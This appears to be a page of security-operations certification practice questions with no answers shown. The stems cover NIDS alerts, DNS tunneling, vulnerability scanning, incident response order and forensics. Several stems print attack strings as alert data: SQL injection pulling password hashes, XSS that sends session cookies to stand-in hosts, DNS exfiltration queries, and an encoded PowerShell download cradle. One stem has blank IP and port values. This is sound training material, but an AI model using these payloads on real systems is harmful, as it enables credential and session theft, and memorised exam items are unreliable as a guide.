Security Operations
627 questions
A network security monitoring sensor flags an alert for anomalous outbound traffic generated by an internal host. The NIDS sensor recorded the following event log details:
Timestamp: 2026-07-27T10:42:19Z
Source IP: 10.4.12.105
Destination IP: 198.51.100.89
Destination Port: 8443/TCP
Configured Inspection Rule: Expect HTTPS / TLS Application Protocol
Observed Banner Payload: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
Which of the following is the most accurate analysis of this network alert?
A Security Operations Center (SOC) analyst is reviewing an alert triggered by a perimeter Network Intrusion Detection System (NIDS). The NIDS captured the following HTTP request payload targeting an internal customer portal:
GET /catalog.php?item=42%20UNION%20SELECT%20username,password_hash%20FROM%20user_credentials-- HTTP/1.1
Host: portal.company.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Based on this network security monitoring alert, which of the following is the most accurate assessment of the threat and the appropriate immediate analyst action?
An enterprise Security Operations Center (SOC) detects anomalous, high-volume outbound UDP port 53 traffic originating from an automated internal build server. Log inspection reveals structured base64-encoded strings appended to DNS queries sent to an external, unclassified domain, indicating active DNS tunneling and data exfiltration. Which TWO of the following actions should the incident response team perform FIRST to contain the threat while preserving evidence? (Select TWO.)
Select all that apply
A security analyst reviews a high-severity alert generated by a Network Intrusion Detection System (NIDS) monitoring enterprise perimeter web traffic. The SIEM correlation rule triggered on the following HTTP payload excerpt:
`GET /products/search?user_input=<script>window.location='http://malicious-exfil.com/collector?cookie='+document.cookie</script> HTTP/1.1`
The analyst logs the incident as a successful SQL injection attack attempting to query sensitive database tables. Which of the following best explains why the analyst's interpretation of this network alert is incorrect?
A security operations team is configuring an automated vulnerability management workflow for a hybrid cloud environment containing both ephemeral container workloads and legacy database servers. Which of the following scanning strategies should the team implement to minimize network overhead while ensuring accurate detection of OS-level vulnerabilities? (Select TWO.)
Select all that apply
To enforce strict endpoint security across a hybrid workforce, a security team is designing a host health validation strategy to enforce configuration baselines and patch management standards. Which of the following technical controls directly ensure that endpoints maintain verified baseline configurations and patch levels? (Select TWO.)
Select all that apply
An enterprise infrastructure team is deploying an out-of-band Network Security Monitoring (NSM) sensor to monitor network perimeter traffic without introducing inline latency. Place the operational steps for establishing and validating this monitoring capability in the correct sequential order from initial network tap setup to final alert validation.
Drag items to arrange them in the correct order
A security analyst is designing a vulnerability assessment strategy for an enterprise environment that includes both ephemeral cloud virtual machines that dynamically auto-scale and legacy operational technology (OT) controllers that are susceptible to crashing under heavy active network traffic. Which deployment model best provides comprehensive vulnerability visibility while minimizing operational risk and disruption across both asset types?
A security administrator inspecting Network Intrusion Detection System (NIDS) alerts detects an HTTP POST request targeting an internal human resources portal. The recorded packet payload contains the string: `user=jdoe&token=<script>document.location='http://external-logger.net/collect?c='+document.cookie</script>`. Which of the following correctly identifies the vector shown in the alert and the proper security control response?
An enterprise security team is evaluating alert telemetry generated by a network intrusion detection system (NIDS) and netflow collectors monitoring a DMZ web server (IP address ). Flow telemetry demonstrates persistent outbound TCP connections initiated every seconds to an external IP address () over port . However, NIDS packet payload analysis reveals that the outbound traffic consists of raw, unencrypted HTTP POST requests containing base64-encoded strings rather than valid TLS handshake negotiations. Which of the following conclusions best explains this alert scenario?
A Security Operations Center (SOC) analyst is reviewing identity logs following an automated alert. The logs record two successful authentication events for the same employee account within a short timeframe:
- 14:02:11 UTC | Account: j.smith | Location: New York, USA | Method: Password + TOTP | Status: SUCCESS
- 14:05:30 UTC | Account: j.smith | Location: Tokyo, Japan | Method: Password + Push Prompt | Status: SUCCESS
Based on these logs, which of the following identifies the most likely operational security issue and the correct immediate response?
An organization's security team integrates an automated SOAR playbook with their container orchestration platform to terminate and redeploy application pods whenever runtime security threats are detected. Following a threat feed update, a high volume of false-positive alerts triggers continuous pod terminations, resulting in an application service outage. Which of the following workflow modifications best prevents this cascading operational disruption while preserving automated remediation capabilities?
A security analyst detects active data exfiltration originating from a compromised database server. Which of the following incident response steps should be taken first?
A security operations analyst is investigating an automated high-severity alert triggered by an enterprise SIEM. The alert correlated the following log entries generated by an internal host (`192.168.10.45`) across a local DNS resolver and perimeter firewall logs:
text
2026-07-27T14:15:02Z dns-core-01 named[4102]: client @0x7f8a 192.168.10.45#51204 (61646d696e2d6372656473.exfil.attacker.net): query: 61646d696e2d6372656473.exfil.attacker.net IN TXT + (10.0.0.2)
2026-07-27T14:15:05Z dns-core-01 named[4102]: client @0x7f8a 192.168.10.45#51205 (70617373776f72643132.exfil.attacker.net): query: 70617373776f72643132.exfil.attacker.net IN TXT + (10.0.0.2)
2026-07-27T14:15:09Z dns-core-01 named[4102]: client @0x7f8a 192.168.10.45#51206 (5345435245544b455931.exfil.attacker.net): query: 5345435245544b455931.exfil.attacker.net IN TXT + (10.0.0.2)
2026-07-27T14:15:12Z fw-edge-01 syslog: action="allow" src_ip=192.168.10.45 src_port=51207 dst_ip=198.51.100.53 dst_port=53 proto=UDP bytes_sent=4120 bytes_recv=8900
Based on these correlated log entries, which of the following malicious activities is taking place, and what key log feature supports this conclusion?
A cybersecurity analyst is responding to an active incident on a powered-on workstation. The analyst must capture digital evidence while strictly adhering to the order of volatility. Which of the following evidence sources should the analyst capture FIRST?
During a forensic investigation involving suspected corporate espionage, an incident responder must acquire evidence from an operational server processing sensitive customer data in system memory. The legal team specifies that all collected digital evidence must remain strictly admissible in judicial proceedings and verifiable against tampering throughout the evidence lifecycle. Which of the following procedures best maintains compliance with the order of volatility while establishing proper chain of custody?
A security analyst reviews a SIEM event log alert triggered by a host-based monitoring agent on a financial workstation:
text Timestamp: 2026-07-27T14:22:10Z Device: WKS-FIN-042 Event ID: 4688 (Process Creation) Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine: powershell.exe -ExecutionPolicy Bypass -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJ2h0dHA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEANQAvAHAAYQB5AGwAbwBhAGQALgBwAHMxACcAKQA= ParentProcessName: C:\Program Files\Microsoft Office\Office16\EXCEL.EXE Account Name: jdoe
Based on the correlated process creation details in this log snippet, which of the following attack scenarios is actively occurring?
An organization is updating its cybersecurity procedures to follow the standard NIST SP 800-61 incident response framework. In which sequential order should the cybersecurity team execute the four primary phases of the incident response lifecycle from beginning to end?
Drag items to arrange them in the correct order
During an operational security review, a SOC analyst identifies an unprivileged service account launching an encoded command that executes process hollowing against svchost.exe on a core database host. The analyst needs to stop active adversary command-and-control (C2) communication and prevent lateral movement immediately, while ensuring volatile memory (RAM) remains intact for live memory forensic extraction. Which of the following actions should the analyst execute FIRST using the EDR platform?
A security analyst is conducting a digital forensics collection on a Linux server suspected of being compromised by an attacker. To adhere to forensic principles regarding the order of volatility and evidence integrity, which of the following procedures should the analyst perform during the acquisition phase? (Select TWO).
Select all that apply